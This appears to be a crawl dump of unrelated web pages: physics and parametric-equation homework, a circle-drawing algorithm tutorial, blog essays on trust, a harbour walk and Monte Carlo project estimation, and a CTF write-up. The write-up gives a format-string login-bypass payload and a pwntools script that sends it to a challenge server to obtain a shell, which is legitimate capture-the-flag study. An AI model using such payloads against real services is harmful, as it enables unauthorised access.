The properties of magnetic lines of force are as follows.$\\$ (a) Magnetic field lines emerge from the north pole.$\\$ (b) They merge at the south pole.$\\$ (c) The direction of field lines inside the magnet is from the south pole to the north pole.$\\$ (d) Magnetic lines do not intersect with each other.
4 Why don’t two magnetic lines of force intersect each other?
##### Solution :
If two field lines of a magnet intersect, then at the point of intersection, the compass needle points in two different directions. This is not possible. Hence, two field lines do not intersect each other.
5 Consider a circular loop of wire lying in the plane of the table. Let the current pass through the loop clockwise. Apply the right-hand rule to find out the direction of the magnetic field inside and outside the loop.
##### Solution :
Inside the loop = Pierce inside the table$\\$ Outside the loop = Appear to emerge out from the table$\\$ For downward direction of current flowing in the circular loop, the direction of magnetic field lines will be as if they are emerging from the table outside the loop and merging in the table inside the loop. Similarly, for upward direction of current flowing in the circular loop, the direction of magnetic field lines will be as if they are emerging from the table outside the loop and merging in the table inside the loop, as shown in the given figure. | 2019-02-18 11:11:11 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5632834434509277, "perplexity": 359.31518932956783}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247484928.52/warc/CC-MAIN-20190218094308-20190218120308-00448.warc.gz"} |
https://www.transtutors.com/questions/suppose-parametric-equations-for-the-line-segment-between-8-9-and-1-3-have-the-form--1352995.htm | # Suppose parametric equations for the line segment between (8,?9) and (?1,?3) have the form: x=a+bt y
Suppose parametric equations for the line segment between (8,?9) and (?1,?3) have the form:
x=a+bt
y=c+dt
If the parametric curve starts at (8,?9) when t=0 and ends at (?1,?3) at t=1, then find a, b, c, and d. | 2021-06-23 08:06:18 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9688899517059326, "perplexity": 1726.2093235898901}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488536512.90/warc/CC-MAIN-20210623073050-20210623103050-00604.warc.gz"} |
https://ctftime.org/writeup/28572 | Tags: printf
Rating: 5.0
# Yet Another Login (19 solves, 225 points)
by FeDEX
Just another another simple login bypass challenge.
nc challs.m0lecon.it 5556
Author: Alberto247
This challenge is similar to the "Another Login" challenge, the only difference is that the seed is cleared from the stack and there is no way we can leak it anymore.
In this case, we need to think of another trick in order to bypass the login. Given that the input size is quite short (19 bytes) wee don't have the comfort to overwrite pointers and corrupt values on the stack as this approach would be too long.
Thus, the technique we can up with is to use * trick which would allow us to take the padding length from the stack and when we can write it in the sum variable thus bypass all conditions.
So, we just need to send 16 times the following payload: %*11$c%*9$c%8$n python from pwn import remote #pip install pwntools from hashlib import sha256 def solvepow(p, n): s = p.recvline() starting = s.split(b'with ')[1][:10].decode() s1 = s.split(b'in ')[-1][:n] i = 0 print("Solving PoW...") while True: if sha256((starting+str(i)).encode('ascii')).hexdigest()[-n:] == s1.decode(): print("Solved!") p.sendline(starting + str(i)) break i += 1 def exploit(p): #p.interactive() for i in range(16): p.recvuntil("Give") print(p.recvline()) p.sendline("%*11$c%*9$c%8$n")
print("Got shell!")
p.interactive()
if __name__ == '__main__':
p = remote('challs.m0lecon.it', 5556)
solvepow(p, n = 5)
exploit(p)
- flag: ptm{N0w_th1s_1s_th3_r34l_s3rv3r!} | 2021-06-20 19:34:42 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.27954885363578796, "perplexity": 2251.6085798134404}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488253106.51/warc/CC-MAIN-20210620175043-20210620205043-00238.warc.gz"} |
https://www.tutorialspoint.com/computer_graphics/circle_generation_algorithm.htm | # Circle Generation Algorithm
Drawing a circle on the screen is a little complex than drawing a line. There are two popular algorithms for generating a circle − Bresenham’s Algorithm and Midpoint Circle Algorithm. These algorithms are based on the idea of determining the subsequent points required to draw the circle. Let us discuss the algorithms in detail −
The equation of circle is $X^{2} + Y^{2} = r^{2},$ where r is radius.
## Bresenham’s Algorithm
We cannot display a continuous arc on the raster display. Instead, we have to choose the nearest pixel position to complete the arc.
From the following illustration, you can see that we have put the pixel at (X, Y) location and now need to decide where to put the next pixel − at N (X+1, Y) or at S (X+1, Y-1).
This can be decided by the decision parameter d.
• If d <= 0, then N(X+1, Y) is to be chosen as next pixel.
• If d > 0, then S(X+1, Y-1) is to be chosen as the next pixel.
### Algorithm
Step 1 − Get the coordinates of the center of the circle and radius, and store them in x, y, and R respectively. Set P=0 and Q=R.
Step 2 − Set decision parameter D = 3 – 2R.
Step 3 − Repeat through step-8 while P ≤ Q.
Step 4 − Call Draw Circle (X, Y, P, Q).
Step 5 − Increment the value of P.
Step 6 − If D < 0 then D = D + 4P + 6.
Step 7 − Else Set R = R - 1, D = D + 4(P-Q) + 10.
Step 8 − Call Draw Circle (X, Y, P, Q).
Draw Circle Method(X, Y, P, Q).
Call Putpixel (X + P, Y + Q).
Call Putpixel (X - P, Y + Q).
Call Putpixel (X + P, Y - Q).
Call Putpixel (X - P, Y - Q).
Call Putpixel (X + Q, Y + P).
Call Putpixel (X - Q, Y + P).
Call Putpixel (X + Q, Y - P).
Call Putpixel (X - Q, Y - P).
## Mid Point Algorithm
Step 1 − Input radius r and circle center $(x_{c,} y_{c})$ and obtain the first point on the circumference of the circle centered on the origin as
(x0, y0) = (0, r)
Step 2 − Calculate the initial value of decision parameter as
$P_{0}$ = 5/4 – r (See the following description for simplification of this equation.)
f(x, y) = x2 + y2 - r2 = 0
f(xi - 1/2 + e, yi + 1)
= (xi - 1/2 + e)2 + (yi + 1)2 - r2
= (xi- 1/2)2 + (yi + 1)2 - r2 + 2(xi - 1/2)e + e2
= f(xi - 1/2, yi + 1) + 2(xi - 1/2)e + e2 = 0
Let di = f(xi - 1/2, yi + 1) = -2(xi - 1/2)e - e2
Thus,
If e < 0 then di > 0 so choose point S = (xi - 1, yi + 1).
di+1 = f(xi - 1 - 1/2, yi + 1 + 1) = ((xi - 1/2) - 1)2 + ((yi + 1) + 1)2 - r2
= di - 2(xi - 1) + 2(yi + 1) + 1
= di + 2(yi + 1 - xi + 1) + 1
If e >= 0 then di <= 0 so choose point T = (xi, yi + 1)
di+1 = f(xi - 1/2, yi + 1 + 1)
= di + 2yi+1 + 1
The initial value of di is
d0 = f(r - 1/2, 0 + 1) = (r - 1/2)2 + 12 - r2
= 5/4 - r {1-r can be used if r is an integer}
When point S = (xi - 1, yi + 1) is chosen then
di+1 = di + -2xi+1 + 2yi+1 + 1
When point T = (xi, yi + 1) is chosen then
di+1 = di + 2yi+1 + 1
Step 3 − At each $X_{K}$ position starting at K=0, perform the following test −
If PK < 0 then next point on circle (0,0) is (XK+1,YK) and
PK+1 = PK + 2XK+1 + 1
Else
PK+1 = PK + 2XK+1 + 1 – 2YK+1
Where, 2XK+1 = 2XK+2 and 2YK+1 = 2YK-2.
Step 4 − Determine the symmetry points in other seven octants.
Step 5 − Move each calculate pixel position (X, Y) onto the circular path centered on $(X_{C,} Y_{C})$ and plot the coordinate values.
X = X + XC, Y = Y + YC
Step 6 − Repeat step-3 through 5 until X >= Y. | 2021-09-17 04:45:06 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7080925107002258, "perplexity": 2840.875737593954}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780054023.35/warc/CC-MAIN-20210917024943-20210917054943-00016.warc.gz"} |
https://eight2late.wordpress.com/category/project-management/ | # Eight to Late
Sensemaking and Analytics for Organizations
## 3 or 7, truth or trust
“It is clear that ethics cannot be articulated.” – Ludwig Wittgenstein
Over the last few years I’ve been teaching and refining a series of lecture-workshops on Decision Making Under Uncertainty. Audiences include data scientists and mid-level managers working in corporates and public service agencies. The course is based on the distinction between uncertainties in which the variables are known and can be quantified versus those in which the variables are not known upfront and/or are hard to quantify.
Before going any further, it is worth explaining the distinction via a couple of examples:
An example of the first type of uncertainty is project estimation. A project has an associated time and cost, and although we don’t know what their values are upfront, we can estimate them if we have the right data. The point to note is this: because such problems can be quantified, the human brain tends to deal with them in a logical manner.
In contrast, business strategy is an example of the second kind of uncertainty. Here we do not know what the key variables are upfront. Indeed we cannot, because different stakeholders will perceive different aspects of a strategy to be paramount depending on their interests – consider, for example, the perspective of a CFO versus that of a CMO. Because of these differences, one cannot make progress on such problems until agreement has been reached on what is important to the group as a whole. The point to note here is that since such problems involve contentious issues, our reactions to them tend to be emotional rather than logical.
The difference between the two types of uncertainty is best conveyed experientially, so I have a few in-class activities aimed at doing just that. One of them is an exercise I call “3 or 7“, in which I give students a sheet with the following printed on it:
Circle either the number 3 or 7 below depending on whether you want 3 marks or 7 marks added to your Assignment 2 final mark. Yes, this offer is for real, but there a catch: if more than 10% of the class select 7, no one gets anything.
Write your student ID on the paper so that Kailash can award you the marks. Needless to say, your choice will remain confidential, no one (but Kailash) will know what you have selected.
3 7
Prior to handing out the sheet, I tell them that they:
• should sit far enough apart so that they can’t see what their neighbours choose,
• are not allowed to communicate their choices to others until the entire class has turned their sheets.
Before reading any further you may want to think about what typically happens.
–x–
Many readers would have recognized this exercise as a version of the Prisoner’s Dilemma and, indeed, many students in my classes recognize this too. Even so, there are always enough of “win at the cost of others” types in the room who ensure that I don’t have to award any extra marks. I’ve run the exercise about 10 times, often with groups comprised of highly collaborative individuals who work well together. Despite that,15-20% of the class ends up opting for 7.
It never fails to surprise me that, even in relatively close-knit groups, there are invariably a number of individuals who, if given a chance to gain at the expense of their colleagues, will not hesitate to do so providing their anonymity is ensured.
–x–
Conventional management thinking deems that any organisational activity involving several people has to be closely supervised. Underlying this view is the assumption that individuals involved in the activity will, if left unsupervised, make decisions based on self-interest rather than the common good (as happens in the prisoner’s dilemma game). This assumption finds justification in rational choice theory, which predicts that individuals will act in ways that maximise their personal benefit without any regard to the common good. This view is exemplified in 3 or 7 and, at a societal level, in the so-called Tragedy of the Commons, where individuals who have access to a common resource over-exploit it, thus depleting the resource entirely.
Fortunately, such a scenario need not come to pass: the work of Elinor Ostrom, one of the 2009 Nobel prize winners for Economics, shows that, given the right conditions, groups can work towards the common good even if it means forgoing personal gains.
Classical economics assumes that individuals’ actions are driven by rational self-interest – i.e. the well-known “what’s in it for me” factor. Clearly, the group will achieve much better results as a whole if it were to exploit the resource in a cooperative way. There are several real-world examples where such cooperative behaviour has been successful in achieving outcomes for the common good (this paper touches on some). However, according to classical economic theory, such cooperative behaviour is simply not possible.
So the question is: what’s wrong with rational choice theory? A couple of things, at least:
Firstly, implicit in rational choice theory is the assumption that individuals can figure out the best choice in any given situation. This is obviously incorrect. As Ostrom has stated in one of her papers:
Because individuals are boundedly rational, they do not calculate a complete set of strategies for every situation they face. Few situations in life generate information about all potential actions that one can take, all outcomes that can be obtained, and all strategies that others can take.
Instead, they use heuristics (experienced-based methods), norms (value-based techniques) and rules (mutually agreed regulations) to arrive at “good enough” decisions. Note that Ostrom makes a distinction between norms and rules, the former being implicit (unstated) rules, which are determined by the cultural attitudes and values)
Secondly, rational choice theory assumes that humans behave as self-centred, short-term maximisers. Such theories work in competitive situations such as the stock-market but not in situations in which collective action is called for, such as the prisoners dilemma.
Ostrom’s work essentially addresses the limitations of rational choice theory by outlining how individuals can work together to overcome self-interest.
–x–
In a paper entitled, A Behavioral Approach to the Rational Choice Theory of Collective Action, published in 1998, Ostrom states that:
…much of our current public policy analysis is based on an assumption that rational individuals are helplessly trapped in social dilemmas from which they cannot extract themselves without inducement or sanctions applied from the outside. Many policies based on this assumption have been subject to major failure and have exacerbated the very problems they were intended to ameliorate. Policies based on the assumptions that individuals can learn how to devise well-tailored rules and cooperate conditionally when they participate in the design of institutions affecting them are more successful in the field…[Note: see this book by Baland and Platteau, for example]
Since rational choice theory aims to maximise individual gain, it does not work in situations that demand collective action – and Ostrom presents some very general evidence to back this claim. More interesting than the refutation of rational choice theory, though, is Ostrom’s discussion of the ways in which individuals “trapped” in social dilemmas end up making the right choices. In particular she singles out two empirically grounded ways in which individuals work towards outcomes that are much better than those offered by rational choice theory. These are:
Communication: In the rational view, communication makes no difference to the outcome. That is, even if individuals make promises and commitments to each other (through communication), they will invariably break these for the sake of personal gain …or so the theory goes. In real life, however, it has been found that opportunities for communication significantly raise the cooperation rate in collective efforts (see this paper abstract or this one, for example). Moreover, research shows that face-to-face is far superior to any other form of communication, and that the main benefit achieved through communication is exchanging mutual commitment (“I promise to do this if you’ll promise to do that”) and increasing trust between individuals. It is interesting that the main role of communication is to enhance or reinforce the relationship between individuals rather than to transfer information. This is in line with the interactional theory of communication.
Innovative Governance: Communication by itself may not be enough; there must be consequences for those who break promises and commitments. Accordingly, cooperation can be encouraged by implementing mutually accepted rules for individual conduct, and imposing sanctions on those who violate them. This effectively amounts to designing and implementing novel governance structures for the activity. Note that this must be done by the group; rules thrust upon the group by an external authority are unlikely to work.
Of course, these factors do not come into play in artificially constrained and time-bound scenarios like 3 or 7. In such situations, there is no opportunity or time to communicate or set up governance structures. What is clear, even from the simple 3 or 7 exercise, is that these are required even for groups that appear to be close-knit.
Ostrom also identifies three core relationships that promote cooperation. These are:
Reciprocity: this refers to a family of strategies that are based on the expectation that people will respond to each other in kind – i.e. that they will do unto others as others do unto them. In group situations, reciprocity can be a very effective means to promote and sustain cooperative behaviour.
Reputation: This refers to the general view of others towards a person. As such, reputation is a part of how others perceive a person, so it forms a part of the identity of the person in question. In situations demanding collective action, people might make judgements on a person’s reliability and trustworthiness based on his or her reputation.’
Trust: Trust refers to expectations regarding others’ responses in situations where one has to act before others. And if you think about it, everything else in Ostrom’s framework is ultimately aimed at engendering or – if that doesn’t work – enforcing trust.
–x—
In an article on ethics and second-order cybernetics, Heinz von Foerster tells the following story:
I have a dear friend who grew up in Marrakech. The house of his family stood on the street that divide the Jewish and the Arabic quarter. As a boy he played with all the others, listened to what they thought and said, and learned of their fundamentally different views. When I asked him once, “Who was right?” he said, “They are both right.”
“But this cannot be,” I argued from an Aristotelian platform, “Only one of them can have the truth!”
“The problem is not truth,” he answered, “The problem is trust.”
For me, that last line summarises the lesson implicit in the admittedly artificial scenario of 3 or 7. In our search for facts and decision-making frameworks we forget the simple truth that in many real-life dilemmas they matter less than we think. Facts and frameworks cannot help us decide on ambiguous matters in which the outcome depends on what other people do. In such cases the problem is not truth; the problem is trust. From your own experience it should be evident it is impossible convince others of your trustworthiness by assertion, the only way to do so is by behaving in a trustworthy way. That is, by behaving ethically rather than talking about it, a point that is squarely missed by so-called business ethics classes.
Yes, it is clear that ethics cannot be articulated.
Notes:
1. Portions of this article are lightly edited sections from a 2009 article that I wrote on Ostrom’s work and its relevance to project management.
2. Finally, an unrelated but important matter for which I seek your support for a common good: I’m taking on the 7 Bridges Walk to help those affected by cancer. Please donate via my 7 Bridges fundraising page if you can . Every dollar counts; all funds raised will help Cancer Council work towards the vision of a cancer free future.
Written by K
September 18, 2019 at 8:28 pm
## Seven Bridges revisited – further reflections on the map and the territory
The Seven Bridges Walk is an annual fitness and fund-raising event organised by the Cancer Council of New South Wales. The picturesque 28 km circuit weaves its way through a number of waterfront suburbs around Sydney Harbour and takes in some spectacular views along the way. My friend John and I did the walk for the first time in 2017. Apart from thoroughly enjoying the experience, there was another, somewhat unexpected payoff: the walk evoked some thoughts on project management and the map-territory relationship which I subsequently wrote up in a post on this blog.
Figure 1:The map, the plan
We enjoyed the walk so much that we decided to do it again in 2018. Now, it is a truism that one cannot travel exactly the same road twice. However, much is made of the repeatability of certain kinds of experiences. For example, the discipline of project management is largely predicated on the assumption that projects are repeatable. I thought it would be interesting to see how this plays out in the case of a walk along a well-defined route, not the least because it is in many ways akin to a repeatable project.
To begin with, it is easy enough to compare the weather conditions on the two days: 29 Oct 2017 and 28 Oct 2018. A quick browse of this site gave me the data as I was after (Figure 2).
Figure 2: Weather on 29 Oct 2017 and 28 Oct 2018
The data supports our subjective experience of the two walks. The conditions in 2017 were less than ideal for walking: clear and uncomfortably warm with a hot breeze from the north. 2018 was considerably better: cool and overcast with a gusty south wind – in other words, perfect walking weather. Indeed, one of the things we commented on the second time around was how much more pleasant it was.
But although weather conditions matter, they tell but a part of the story.
On the first walk, I took a number of photographs at various points along the way. I thought it would be interesting to take photographs at the same spots, at roughly the same time as I did the last time around, and compare how things looked a year on. In the next few paragraphs I show a few of these side by side (2017 left, 2018 right) along with some comments.
We started from Hunters Hill at about 7:45 am as we did on our first foray, and took our first photographs at Fig Tree Bridge, about a kilometre from the starting point.
Figure 3: Lane Cove River from Fig Tree Bridge (2017 Left, 2018 Right)
The purple Jacaranda that captivated us in 2017 looks considerably less attractive the second time around (Figure 3): the tree is yet to flower and what little there is there does not show well in the cloud-diffused light. Moreover, the scaffolding and roof covers on the building make for a much less attractive picture. Indeed, had the scene looked so the first time around, it is unlikely we would have considered it worthy of a photograph.
The next shot (Figure 4), taken not more than a hundred metres from the previous one, also looks considerably different: rougher waters and no kayakers in the foreground. Too cold and windy, perhaps? The weather and wind data in Fig 2 would seem to support that conclusion.
Figure 4: Morning kayakers on the river (2017 Left, 2018 Right)
The photographs in Figure 5 were taken at Pyrmont Bridge about four hours into the walk. We already know from Figure 4 that it was considerably windier in 2018. A comparison of the flags in the two shots in Figure 5 reveal an additional detail: the wind was from opposite directions in the two years. This is confirmed by the weather information in Figure 2, which also tells us that the wind was from the north in 2017 and the south the following year (which explains the cooler conditions). We can even get an approximate temperature: the photographs were taken around 11:30 am both years, and a quick look at Figure 2 reveals that the temperature at noon was about 30 C in 2017 and 18 C in 2018.
Figure 5: Pyrmont Bridge (2017 Left, 2018 Right)
The point about the wind direction and cloud conditions is also confirmed by comparing the photographs in Figure 6, taken at Anzac Bridge, a few kilometres further along the way (see the direction of the flag atop the pylon).
Figure 6: View looking up Anzac Bridge (2017 L, 2018 R)
Skipping over to the final section of the walk, here are a couple of shots I took towards the end: Figure 7 shows a view from Gladesville Bridge and Figure 8 shows one from Tarban Creek Bridge. Taken together the two confirm some of the things we’ve already noted regarding the weather and conditions for photography.
Figure 7: View from Gladesville Bridge (2017 L, 2018 R)
Further, if you look closely at Figures 7 and 8, you will also see the differences in the flowering stage of the Jacaranda.
Figure 8: View from Tarban Creek Bridge (2017 L, 2018 R)
A detail that I did not notice until John pointed it out is that the the boat at the bottom edge of both photographs in Fig. 8 is the same one (note the colour of the furled sail)! This was surprising to us, but it should not have been so. It turns out that boat owners have to apply for private mooring licenses and are allocated positions at which they install a suitable mooring apparatus. Although this is common knowledge for boat owners, it likely isn’t so for others.
The photographs are a visual record of some of the things we encountered along the way. However, the details in recorded in them have more to do with aesthetics rather the experience – in photography of this kind, one tends to preference what looks good over what happened. Sure, some of the photographs offer hints about the experience but much of this is incidental and indirect. For example, when taking the photographs in Figures 5 and 6, it was certainly not my intention to record the wind direction. Indeed, that would have been a highly convoluted way to convey information that is directly and more accurately described by the data in Figure 2 . That said, even data has limitations: it can help fill in details such as the wind direction and temperature but it does not evoke any sense of what it was like to be there, to experience the experience, so to speak.
Neither data nor photographs are the stuff memories are made of. For that one must look elsewhere.
–x–
As Heraclitus famously said, one can never step into the same river twice. So it is with walks. Every experience of a walk is unique; although map remains the same the territory is invariably different on each traverse, even if only subtly so. Indeed, one could say that the territory is defined through one’s experience of it. That experience is not reproducible, there are always differences in the details.
As John Salvatier points out, reality has a surprising amount of detail, much of which we miss because we look but do not see. Seeing entails a deliberate focus on minutiae such as the play of morning light on the river or tree; the cool damp from last night’s rain; changes in the built environment, some obvious, others less so. Walks are made memorable by precisely such details, but paradoxically these can be hard to record in a meaningful way. Factual (aka data-driven) descriptions end up being laundry lists that inevitably miss the things that make the experience memorable.
Poets do a better job. Consider, for instance, Tennyson‘s take on a brook:
“…I chatter over stony ways,
In little sharps and trebles,
I bubble into eddying bays,
I babble on the pebbles.
With many a curve my banks I fret
By many a field and fallow,
And many a fairy foreland set
With willow-weed and mallow.
I chatter, chatter, as I flow
To join the brimming river,
For men may come and men may go,
But I go on for ever….”
One can almost see and hear a brook. Not Tennyson’s, but one’s own version of it.
Evocative descriptions aren’t the preserve of poets alone. Consider the following description of Sydney Harbour, taken from DH Lawrence‘s Kangaroo:
“…He took himself off to the gardens to eat his custard apple-a pudding inside a knobbly green skin-and to relax into the magic ease of the afternoon. The warm sun, the big, blue harbour with its hidden bays, the palm trees, the ferry steamers sliding flatly, the perky birds, the inevitable shabby-looking, loafing sort of men strolling across the green slopes, past the red poinsettia bush, under the big flame-tree, under the blue, blue sky-Australian Sydney with a magic like sleep, like sweet, soft sleep-a vast, endless, sun-hot, afternoon sleep with the world a mirage. He could taste it all in the soft, sweet, creamy custard apple. A wonderful sweet place to drift in….”
Written in 1923, it remains a brilliant evocation of the Harbour even today.
Tennyson’s brook and Lawrence’s Sydney do a better job than photographs or factual description, even though the latter are considered more accurate and objective. Why? It is because their words are more than mere description: they are stories that convey a sense of what it is like to be there.
–x–
The two editions of the walk covered exactly the same route, but our experiences of the territory on the two instances were very different. The differences were in details that ultimately added up to the uniqueness of each experience. These details cannot be captured by maps and visual or written records, even in principle. So although one may gain familiarity with certain aspects of a territory through repetition, each lived experience of it will be unique. Moreover, no two individuals will experience the territory in exactly the same way.
When bidding for projects, consultancies make much of their prior experience of doing similar projects elsewhere. The truth, however, is that although two projects may look identical on paper they will invariably be different in practice. The map, as Korzybski famously said, is not the territory. Even more, every encounter with the territory is different.
All this is not to say that maps (or plans or data) are useless, one needs them as orienting devices. However, one must accept that they offer limited guidance on how to deal with the day-to-day events and occurrences on a project. These tend to be unique because they are highly context dependent. The lived experience of a project is therefore necessarily different from the planned one. How can one gain insight into the former? Tennyson and Lawrence offer a hint: look to the stories told by people who have traversed the territory, rather than the maps, plans and data-driven reports they produce.
Written by K
February 15, 2019 at 8:24 am
Posted in Project Management
## A gentle introduction to Monte Carlo simulation for project managers
This article covers the why, what and how of Monte Carlo simulation using a canonical example from project management – estimating the duration of a small project. Before starting, however, I’d like say a few words about the tool I’m going to use.
In keeping with the format of the tutorials on this blog, I’ve assumed very little prior knowledge about probability, let alone Monte Carlo simulation. Consequently, the article is verbose and the tone somewhat didactic.
### Introduction
Estimation is key part of a project manager’s role. The most frequent (and consequential) estimates they are asked deliver relate to time and cost. Often these are calculated and presented as point estimates: i.e. single numbers – as in, this task will take 3 days. Or, a little better, as two-point ranges – as in, this task will take between 2 and 5 days. Better still, many use a PERT-like approach wherein estimates are based on 3 points: best, most likely and worst case scenarios – as in, this task will take between 2 and 5 days, but it’s most likely that we’ll finish on day 3. We’ll use three-point estimates as a starting point for Monte Carlo simulation, but first, some relevant background.
It is a truism, well borne out by experience, that it is easier to estimate small, simple tasks than large, complex ones. Indeed, this is why one of the early to-dos in a project is the construction of a work breakdown structure. However, a problem arises when one combines the estimates for individual elements into an overall estimate for a project or a phase thereof. It is that a straightforward addition of individual estimates or bounds will almost always lead to a grossly incorrect estimation of overall time or cost. The reason for this is simple: estimates are necessarily based on probabilities and probabilities do not combine additively. Monte Carlo simulation provides a principled and intuitive way to obtain probabilistic estimates at the level of an entire project based on estimates of the individual tasks that comprise it.
### The problem
The best way to explain Monte Carlo is through a simple worked example. So, let’s consider a 4 task project shown in Figure 1. In the project, the second task is dependent on the first, and third and fourth are dependent on the second but not on each other. The upshot of this is that the first two tasks have to be performed sequentially and the last two can be done at the same time, but can only be started after the second task is completed.
To summarise: the first two tasks must be done in series and the last two can be done in parallel.
Figure 1; A project with 4 tasks.
Figure 1 also shows the three point estimates for each task – that is the minimum, maximum and most likely completion times. For completeness I’ve listed them below:
• Task 1 – Min: 2 days; Most Likely: 4 days; Max: 8 days
• Task 2 – Min: 3 days; Most Likely: 5 days; Max: 10 days
• Task 3 – Min: 3 days; Most Likely: 6 days; Max: 9 days
• Task 4 – Min: 2 days; Most Likely: 4 days; Max: 7 days
OK, so that’s the situation as it is given to us. The first step to developing an estimate is to formulate the problem in a way that it can be tackled using Monte Carlo simulation. This bring us to the important topic of the shape of uncertainty aka probability distributions.
### The shape of uncertainty
Consider the data for Task 1. You have been told that it most often finishes on day 4. However, if things go well, it could take as little as 2 days; but if things go badly it could take as long as 8 days. Therefore, your range of possible finish times (outcomes) is between 2 to 8 days.
Clearly, each of these outcomes is not equally likely. The most likely outcome is that you will finish the task in 4 days (from what your team member has told you). Moreover, the likelihood of finishing in less than 2 days or more than 8 days is zero. If we plot the likelihood of completion against completion time, it would look something like Figure 2.
Figure 2: Likelihood of finishing on day 2, day 4 and day 8.
Figure 2 begs a couple of questions:
1. What are the relative likelihoods of completion for all intermediate times – i.e. those between 2 to 4 days and 4 to 8 days?
2. How can one quantify the likelihood of intermediate times? In other words, how can one get a numerical value of the likelihood for all times between 2 to 8 days? Note that we know from the earlier discussion that this must be zero for any time less than 2 or greater than 8 days.
The two questions are actually related. As we shall soon see, once we know the relative likelihood of completion at all times (compared to the maximum), we can work out its numerical value.
Since we don’t know anything about intermediate times (I’m assuming there is no other historical data available), the simplest thing to do is to assume that the likelihood increases linearly (as a straight line) from 2 to 4 days and decreases in the same way from 4 to 8 days as shown in Figure 3. This gives us the well-known triangular distribution.
Jargon Buster: The term distribution is simply a fancy word for a plot of likelihood vs. time.
Figure 3: Triangular distribution fitted to points in Figure 1
Of course, this isn’t the only possibility; there are an infinite number of others. Figure 4 is another (admittedly weird) example.
Figure 4: Another distribution that fits the points in Figure 2.
Further, it is quite possible that the upper limit (8 days) is not a hard one. It may be that in exceptional cases the task could take much longer (for example, if your team member calls in sick for two weeks) or even not be completed at all (for example, if she then leaves for that mythical greener pasture). Catering for the latter possibility, the shape of the likelihood might resemble Figure 5.
Figure 5: A distribution that allows for a very long (potentially) infinite completion time
The main takeaway from the above is that uncertainties should be expressed as shapes rather than numbers, a notion popularised by Sam Savage in his book, The Flaw of Averages.
[Aside: you may have noticed that all the distributions shown above are skewed to the right – that is they have a long tail. This is a general feature of distributions that describe time (or cost) of project tasks. It would take me too far afield to discuss why this is so, but if you’re interested you may want to check out my post on the inherent uncertainty of project task estimates.
### From likelihood to probability
Thus far, I have used the word “likelihood” without bothering to define it. It’s time to make the notion more precise. I’ll begin by asking the question: what common sense properties do we expect a quantitative measure of likelihood to have?
Consider the following:
1. If an event is impossible, its likelihood should be zero.
2. The sum of likelihoods of all possible events should equal complete certainty. That is, it should be a constant. As this constant can be anything, let us define it to be 1.
In terms of the example above, if we denote time by $t$ and the likelihood by $P(t)$ then:
$P(t) = 0$ for $t< 2$ and $t> 8$
And
$\sum_{t}P(t) = 1$ where $2\leq t< 8$
